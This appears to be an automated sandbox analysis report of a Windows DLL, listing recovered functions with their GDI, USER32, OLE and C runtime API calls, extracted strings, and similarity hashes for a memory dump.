ClientToScreen.USER32(?,?), ref: 6EA113B4
ClientToScreen.USER32(?,?), ref: 6EA113C9
ClientToScreen.USER32(?,?), ref: 6EA113EB

Part of subcall function 6EA10DF0: GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6EA11419,?,00000000,?), ref: 6EA10E7E

BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6EA1144D
SelectObject.GDI32(?,?), ref: 6EA11458
SelectObject.GDI32(?,?), ref: 6EA11463
DeleteObject.GDI32(?), ref: 6EA1146D
DeleteDC.GDI32(?), ref: 6EA11474
EndPaint.USER32(?,?), ref: 6EA11482

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSendText$BeginBitmapColorMetricsModeParent
String ID:
API String ID: 1460541294-0
Opcode ID: 1d9aa57a635359f54e20dc72a5ccd27ab5fc17b217164995adb39805a13c6ba3
Instruction ID: dac921abe999155510c5ced708053b65ffc096fea2b792caeaf5834104ec16a0
Opcode Fuzzy Hash: 1d9aa57a635359f54e20dc72a5ccd27ab5fc17b217164995adb39805a13c6ba3
Instruction Fuzzy Hash: EB613D71108B11AFDB209FA4CD08B5BBBE9FF89710F008A1CF695D61A0C775A9458F96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA112B0, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6EA112F3
GetParent.USER32(?), ref: 6EA112FC
GetClientRect.USER32 ref: 6EA11312
CreateCompatibleDC.GDI32(?), ref: 6EA11318
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
SelectObject.GDI32(00000000,00000000), ref: 6EA11346
SelectObject.GDI32(00000000,?), ref: 6EA11358
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
SetBkMode.GDI32(?,00000001), ref: 6EA11388
SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
GetClientRect.USER32 ref: 6EA113A6
ClientToScreen.USER32(?,?), ref: 6EA113B4
ClientToScreen.USER32(?,?), ref: 6EA113C9
ClientToScreen.USER32(?,?), ref: 6EA113EB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6EA1144D
SelectObject.GDI32(?,?), ref: 6EA11458
SelectObject.GDI32(?,?), ref: 6EA11463
DeleteObject.GDI32(?), ref: 6EA1146D
DeleteDC.GDI32(?), ref: 6EA11474
EndPaint.USER32(?,?), ref: 6EA11482

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 5b1affec323c41395e5fa3db79e48fdc5923a88ee9d74d7f70eb02dc91de0878
Instruction ID: 2ed12c65c35e26e49455868fa69ed39c391db410726dc267eef61ad0c77cd352
Opcode Fuzzy Hash: 5b1affec323c41395e5fa3db79e48fdc5923a88ee9d74d7f70eb02dc91de0878
Instruction Fuzzy Hash: 2D511971108B51AFDB209F64CD08F6ABBE9FF89300F00491DF695E6160DB36A9468F92

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07ED0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6EA07F46
VariantInit.OLEAUT32(?), ref: 6EA07F78
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6EA07FA0
SysFreeString.OLEAUT32(-00000001), ref: 6EA07FE1
SysAllocString.OLEAUT32(?), ref: 6EA08049
VariantClear.OLEAUT32(?), ref: 6EA0806B
_com_issue_error.COMSUPP ref: 6EA08096
_com_issue_error.COMSUPP ref: 6EA080A0
_com_issue_error.COMSUPP ref: 6EA080A6
_com_issue_error.COMSUPP ref: 6EA080B0
_com_issue_error.COMSUPP ref: 6EA080BA

Strings

value, xrefs: 6EA08288
name, xrefs: 6EA0814A
counter, xrefs: 6EA0841B, 6EA08446
page, xrefs: 6EA087CB, 6EA087F6

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$StringVariant$Alloc$ChangeClearFreeInitType
String ID: counter$name$page$value
API String ID: 661817203-1733285648
Opcode ID: 5a088ab645cf0f4ccdc4c9e080ccbce1e4417039bed0dfed41a7daf5aec05d92
Instruction ID: 9df58b0fd52a6d3edb910fc7a47f6a505d680f1307a991f22f14aa6920992097
Opcode Fuzzy Hash: 5a088ab645cf0f4ccdc4c9e080ccbce1e4417039bed0dfed41a7daf5aec05d92
Instruction Fuzzy Hash: 43510671904716DBEB20DFE4DD44B8AB7F8AF05718F204A19E855E7280E774EAC0C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10DF0, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 298COMMON

Download Yara Rule

APIs

GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6EA11419,?,00000000,?), ref: 6EA10E7E
GetClientRect.USER32 ref: 6EA110CF
GetDeviceCaps.GDI32(?,0000005A), ref: 6EA11134
MulDiv.KERNEL32(?,00000000,00000048), ref: 6EA11149
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6EA11169
SetTextColor.GDI32(?,?), ref: 6EA11181
SelectObject.GDI32(?,00000000), ref: 6EA11189
DrawTextW.USER32(?,?,?,?,00000000), ref: 6EA111C1
SelectObject.GDI32(?,00000000), ref: 6EA111C9
DeleteObject.GDI32(00000000), ref: 6EA111D0

Strings

%s%d.%d%s, xrefs: 6EA11014
[N/A], xrefs: 6EA10F93
%s%s%s, xrefs: 6EA1106D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientColorCreateDeleteDeviceDrawFontMetricsRect
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 938400745-711029782
Opcode ID: 2865e05e81ce667e904530b46d2bc26635c7059a5dc124e6c2700107af15b79e
Instruction ID: ae28c163bb485ebac6115799cac507ad1645cd10f0a9147d7a9b79484e16e8f3
Opcode Fuzzy Hash: 2865e05e81ce667e904530b46d2bc26635c7059a5dc124e6c2700107af15b79e
Instruction Fuzzy Hash: 13C18C75A002299BDB20CF64CCC5ADAB7B9BF59304F1481E9E509EB251E730AEC5CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA26040, Relevance: 22.8, APIs: 15, Instructions: 343COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA260B0
_free.LIBCMT ref: 6EA260C5
_free.LIBCMT ref: 6EA260DA
_free.LIBCMT ref: 6EA260EF
_free.LIBCMT ref: 6EA26104
GetCPInfo.KERNEL32(?,?), ref: 6EA2614E

Part of subcall function 6EA2DBB5: _free.LIBCMT ref: 6EA2DC20

_free.LIBCMT ref: 6EA26392
_free.LIBCMT ref: 6EA263A5
_free.LIBCMT ref: 6EA263B3
_free.LIBCMT ref: 6EA263BE
_free.LIBCMT ref: 6EA26400
_free.LIBCMT ref: 6EA26408
_free.LIBCMT ref: 6EA26410
_free.LIBCMT ref: 6EA26418
_free.LIBCMT ref: 6EA26426

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c64bb9088cf08d311e14733aa969a93fda82f28076dc7ed41863668ddd8add99
Instruction ID: 7953cd59f6eb1bd8d8f03f4768a84f1500d74024cb774e8d4c72a3f7f6cfadda
Opcode Fuzzy Hash: c64bb9088cf08d311e14733aa969a93fda82f28076dc7ed41863668ddd8add99
Instruction Fuzzy Hash: 12D18C71D016069FDB108FA8C980BEEBBB5FF48300F188579E995B7381D775A885CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08EA0, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 405memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,065D8F34,76AFD5B0,00000000), ref: 6EA08F44
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA08F52
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,065D8F34,76AFD5B0,00000000), ref: 6EA08F6F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6EA08F88
SysFreeString.OLEAUT32(00000000), ref: 6EA08F97
SysFreeString.OLEAUT32(00000000), ref: 6EA09234
SysFreeString.OLEAUT32(00000000), ref: 6EA09286
_com_issue_error.COMSUPP ref: 6EA09294
Concurrency::cancel_current_task.LIBCPMT ref: 6EA09299
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA092A4

Strings

Arial, xrefs: 6EA08FAD
line, xrefs: 6EA08F3B, 6EA08F66

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstrConcurrency::cancel_current_task_com_issue_error
String ID: Arial$line
API String ID: 3866382671-367345269
Opcode ID: 3a207231089f54443607b37602d5186c82fb3603b1ac45e6dac06c0190f04b32
Instruction ID: 68ac6296af8df7a2e5baa948811c3e0a9eaec63ef596cf16f6d657401fb28951
Opcode Fuzzy Hash: 3a207231089f54443607b37602d5186c82fb3603b1ac45e6dac06c0190f04b32
Instruction Fuzzy Hash: 5CE1E370901309DFDB10CFE8DA94BAEBBB5BF89318F14451DE405AB380D774AA85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA31B90, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6EA31BD4

Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33334
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33346
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA33358
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3336A
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3337C
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3338E
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333A0
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333B2
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333C4
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333D6
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333E8
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA333FA
Part of subcall function 6EA33317: _free.LIBCMT ref: 6EA3340C

_free.LIBCMT ref: 6EA31BC9

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

_free.LIBCMT ref: 6EA31BEB
_free.LIBCMT ref: 6EA31C00
_free.LIBCMT ref: 6EA31C0B
_free.LIBCMT ref: 6EA31C2D
_free.LIBCMT ref: 6EA31C40
_free.LIBCMT ref: 6EA31C4E
_free.LIBCMT ref: 6EA31C59
_free.LIBCMT ref: 6EA31C91
_free.LIBCMT ref: 6EA31C98
_free.LIBCMT ref: 6EA31CB5
_free.LIBCMT ref: 6EA31CCD

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b069bfa1c058cd8ce955084d7a4966828f197ab802783e54abe34e67a4dfc801
Instruction ID: b1e9e4c152ad0e78abb79accc90c1bcb84d6a54b2da9c3c941c4e5efd4285a94
Opcode Fuzzy Hash: b069bfa1c058cd8ce955084d7a4966828f197ab802783e54abe34e67a4dfc801
Instruction Fuzzy Hash: 40316D316047259FEB549BB9D944BA677E8FF40314F288C39E4A8E7194DF34ACC48758

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2FECD, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

@Mt, xrefs: 6EA30184, 6EA30226
, xrefs: 6EA30155

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $@Mt
API String ID: 0-580020321
Opcode ID: 8c8a28b35ba5efbc208347fc00382cc856f20b4d57b2f8a1d73375e70d1cb49d
Instruction ID: 5c204a98e6b114263d81060ffa2edfaaaed0cc06b7fae3f68affc744963b0f57
Opcode Fuzzy Hash: 8c8a28b35ba5efbc208347fc00382cc856f20b4d57b2f8a1d73375e70d1cb49d
Instruction Fuzzy Hash: 5EC1F370A042159FDF15CFD9C890BADBBB5BF4A314F284469E514FB282D73199C2CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17640, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6EA07CE5,6EA07CE7,00000000,00000000,065D8F34,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA176C9
__alloca_probe_16.LIBCMT ref: 6EA176EE
MultiByteToWideChar.KERNEL32(00000000,00000000,6EA07CE5,?,00000000,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17744
SysAllocString.OLEAUT32(00000000), ref: 6EA1774F
_com_issue_error.COMSUPP ref: 6EA17778
_com_issue_error.COMSUPP ref: 6EA17782
GetLastError.KERNEL32(80070057,065D8F34,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17787
_com_issue_error.COMSUPP ref: 6EA1779A
GetLastError.KERNEL32(00000000,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA177B0
_com_issue_error.COMSUPP ref: 6EA177C3

Strings

@Mt, xrefs: 6EA17787, 6EA177B0

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
String ID: @Mt
API String ID: 3079088546-1491384996
Opcode ID: 1d706ff189e7a149a796f4a476e04db09740852a590acd787d2b5f563d60bf34
Instruction ID: d9fbd38216e41a5f1f652b42fe6aa29a4b5c24e996be020eba53423718b7f605
Opcode Fuzzy Hash: 1d706ff189e7a149a796f4a476e04db09740852a590acd787d2b5f563d60bf34
Instruction Fuzzy Hash: 51411AB5A083159FDB10CFE8CC44BDEBBA9EB46714F144629F519E7280D7349881CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33415, Relevance: 18.4, APIs: 12, Instructions: 375COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA3345D
_free.LIBCMT ref: 6EA33481
_free.LIBCMT ref: 6EA3348E
_free.LIBCMT ref: 6EA334B3
_free.LIBCMT ref: 6EA334C0
_free.LIBCMT ref: 6EA334C9
_free.LIBCMT ref: 6EA337A4
_free.LIBCMT ref: 6EA337AC

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4583a4ca343183d0615ad771c8dd66df58214c379234bb666424719663887ee9
Instruction ID: e0a7f3a076a8212d5685bab48cd2c1bfc1a10f13a9d02bdb38ddc6eda59da211
Opcode Fuzzy Hash: 4583a4ca343183d0615ad771c8dd66df58214c379234bb666424719663887ee9
Instruction Fuzzy Hash: B4C130B2D40218AFDB10CBE8CD86FDA77FCAF48704F184565FA54FB285D67099848B64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA238F1, Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 493COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6EA23D04

Strings

f, xrefs: 6EA23A40
p, xrefs: 6EA23A01
f, xrefs: 6EA239FA
p, xrefs: 6EA239E5
Z, xrefs: 6EA23AC2
A, xrefs: 6EA23AB8
:, xrefs: 6EA239B8
p, xrefs: 6EA23A47
f, xrefs: 6EA239DE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$A$Z$f$f$f$p$p$p
API String ID: 1302938615-2466996737
Opcode ID: 53e8e950c758bcd4a221d41e3e8ec0d1d684ba5dbaf4fc49d3bf31e6fbadd9ac
Instruction ID: 75577019c54167d0a9a5ba0a4e40e4306addce0faf9da74302adb9d2791be5e4
Opcode Fuzzy Hash: 53e8e950c758bcd4a221d41e3e8ec0d1d684ba5dbaf4fc49d3bf31e6fbadd9ac
Instruction Fuzzy Hash: C8127F3590025B8EEB208FEAD8486DDBBB2FB42B14F684575D4947B284D3704ECCCB1A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA123E0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 179registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12414
GetClassInfoExW.USER32 ref: 6EA12449
GetClassInfoExW.USER32 ref: 6EA1245C
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA12467
LoadCursorW.USER32(6EA00000,?), ref: 6EA124B9
GetClassInfoExW.USER32 ref: 6EA1250F
RegisterClassExW.USER32 ref: 6EA1251F
LeaveCriticalSection.KERNEL32(6EA4CA58), ref: 6EA125B2

Strings

0, xrefs: 6EA12442
ATL:%p, xrefs: 6EA124D9

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: 0$ATL:%p
API String ID: 269841140-2453800769
Opcode ID: 1b9e4467827effa1b0c6badbd29063c2a3600b13b15c8f885f8a55d8fafc7c42
Instruction ID: c59bc22389ebc3f1c138595c842f3c0b8c3e80b0112eb83cd7ba620dab8c64a5
Opcode Fuzzy Hash: 1b9e4467827effa1b0c6badbd29063c2a3600b13b15c8f885f8a55d8fafc7c42
Instruction Fuzzy Hash: 6461C831904B15CFEB20DFA9C99069AB7F5FF4A314B048A1DE84AAB650E731F8C5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04E00, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA04E3F
std::_Lockit::_Lockit.LIBCPMT ref: 6EA04E61
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04E81
std::_Facet_Register.LIBCPMT ref: 6EA04FEA
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA05002
Concurrency::cancel_current_task.LIBCPMT ref: 6EA05024
Concurrency::cancel_current_task.LIBCPMT ref: 6EA05029
Concurrency::cancel_current_task.LIBCPMT ref: 6EA0502E

Strings

false, xrefs: 6EA04F95
true, xrefs: 6EA04FBB

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true
API String ID: 3742692055-2658103896
Opcode ID: f4e1e10a297c27d5df3e33e96241a49054fc43aef27ed63ced8ddef517a133be
Instruction ID: 56deb4fd6ae6746643de7fb1b184bdbc23bc04a09a03cacb648ee130e4d6ef6b
Opcode Fuzzy Hash: f4e1e10a297c27d5df3e33e96241a49054fc43aef27ed63ced8ddef517a133be
Instruction Fuzzy Hash: C461A870904305CFEB21DFE4D940BDABBB4BF45708F14895DE815AB280DB76AA86CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0E100, Relevance: 16.8, APIs: 11, Instructions: 343stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA0DF40: CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6EA0DF7E
Part of subcall function 6EA0DF40: CharNextW.USER32(00000000,?,00000000,00000000), ref: 6EA0DFAB
Part of subcall function 6EA0DF40: CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFC4
Part of subcall function 6EA0DF40: CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFCF
Part of subcall function 6EA0DF40: CharNextW.USER32(00000001,?,00000000,00000000), ref: 6EA0E03E

lstrcmpiW.KERNEL32(?,6EA45944,?,065D8F34,?,00000000,C000008C,?,00000000,6EA38D9B,000000FF,?,6EA0F13E,00000000,00000000,C000008C), ref: 6EA0E183
lstrcmpiW.KERNEL32(?,6EA45948,?,6EA0F13E,00000000,00000000,C000008C,C000008C), ref: 6EA0E19A

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: 827243b0cd8370de9a3387672906b8c76cc8c6518b30f8f9139d6fbed10ec897
Instruction ID: 890abcfb04c1cc87bbac2e6c28bb9c2c69294bb5e3518fbb841bf03968198ba8
Opcode Fuzzy Hash: 827243b0cd8370de9a3387672906b8c76cc8c6518b30f8f9139d6fbed10ec897
Instruction Fuzzy Hash: 0FD11771900229DFDF24CBA4DC44BD9B7B8AF19318F0584D9EA0AA7280E730AED5DF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA19E3A, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6EA19F37
type_info::operator==.LIBVCRUNTIME ref: 6EA19F59
___TypeMatch.LIBVCRUNTIME ref: 6EA1A068
IsInExceptionSpec.LIBVCRUNTIME ref: 6EA1A13A
_UnwindNestedFrames.LIBCMT ref: 6EA1A1BE
CallUnexpected.LIBVCRUNTIME ref: 6EA1A1D9

Strings

csm, xrefs: 6EA19F90
csm, xrefs: 6EA19EE4
csm, xrefs: 6EA19E77

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 788867cfd4b5adb213cf51f02e53444009d6a37570bc6b0b4292692cbc46c2c8
Instruction ID: ba167ba8c0b184eb5416caece4d1dd3a93d904aafa968d0d9d47fa430f7291f9
Opcode Fuzzy Hash: 788867cfd4b5adb213cf51f02e53444009d6a37570bc6b0b4292692cbc46c2c8
Instruction Fuzzy Hash: 5CB1A97180820AEFCF05CFE4CA809DEBBBABF04314F154959E8156B255D331EA99CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10400, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6EA10418
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6EA10445
MulDiv.KERNEL32(00000008,00000000), ref: 6EA1044E
CreateFontW.GDI32(00000000), ref: 6EA10457
ReleaseDC.USER32 ref: 6EA10464
SetTimer.USER32 ref: 6EA10479

Part of subcall function 6EA112B0: BeginPaint.USER32(?,?), ref: 6EA112F3
Part of subcall function 6EA112B0: GetParent.USER32(?), ref: 6EA112FC
Part of subcall function 6EA112B0: GetClientRect.USER32 ref: 6EA11312
Part of subcall function 6EA112B0: CreateCompatibleDC.GDI32(?), ref: 6EA11318
Part of subcall function 6EA112B0: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
Part of subcall function 6EA112B0: SelectObject.GDI32(00000000,00000000), ref: 6EA11346
Part of subcall function 6EA112B0: SelectObject.GDI32(00000000,?), ref: 6EA11358
Part of subcall function 6EA112B0: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
